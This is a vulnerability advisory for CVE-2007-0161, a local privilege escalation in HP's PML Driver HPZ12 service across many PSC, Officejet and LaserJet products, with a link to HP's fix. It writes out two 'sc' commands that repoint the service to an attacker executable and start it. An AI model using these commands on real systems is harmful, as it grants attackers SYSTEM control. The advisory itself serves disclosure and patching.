HP Multiple Products PML Driver HPZ12 Local Privilege Escalation Vulnerability

Bugtraq ID:	21935
Class:	Design Error
CVE:	CVE-2007-0161
Remote:	No
Local:	Yes
Published:	Jan 08 2007 12:00AM
Updated:	Nov 27 2007 06:13PM
Credit:	Sowhat is credited with the discovery of this vulnerability.
Vulnerable:	HP PSC 900 0 HP PSC 700 0 HP PSC 2510 Photosmart Printer HP PSC 2500 Photosmart All-in-one 0 HP PSC 2400 Photosmart All-in-one 0 HP PSC 2200 0 HP PSC 2100 0 HP PSC 1300 0 HP PSC 1210 All-in-One 0 HP PSC 1200 0 HP PSC 1100 0 HP PML Driver HPZ12 0 HP Officejet K 0 HP Officejet G 0 HP Officejet D 0 HP Officejet 7100 0 HP Officejet 6100 0 HP Officejet 5500 0 HP Officejet 5100 0 HP Officejet 4100 0 HP Color LaserJet 4650
Not Vulnerable:

HP Multiple Products PML Driver HPZ12 Local Privilege Escalation Vulnerability

Multiple HP products are prone to a local privilege-escalation vulnerability.

An attacker can exploit this issue to gain SYSTEM-level privileges, completely compromising affected computers.

This issue affects HP products that use the 'PML Driver HPZ12' driver.

HP Multiple Products PML Driver HPZ12 Local Privilege Escalation Vulnerability

An attacker may exploit this issue by gaining local access to an affected computer and issuing the following commands:

C:\sc config "pml driver hpz12" binpath= D:\attack\attack.exe
C:\sc start "pml driver hpz12"

HP Multiple Products PML Driver HPZ12 Local Privilege Escalation Vulnerability

Solution:
HP has released a fix to address this issue. Please see the references for more information.


HP PML Driver HPZ12 0

• HP 500064-HPCOM-PML-V7.exe
  ftp://ftp.hp.com/pub/softlib/software8/COL16949/oj-44705-2/500064-HPCO M-PML-V7.exe

HP Multiple Products PML Driver HPZ12 Local Privilege Escalation Vulnerability

References:

• HP Multiple Products PML Driver Local Privilege Escalation (Sowhat)
  
• HP Multiple Products PML Driver Local Privilege Escalation (Sowhat)
  
• Micro News Homepage (phptoys)
  
• Security update to the HP PML driver (HP)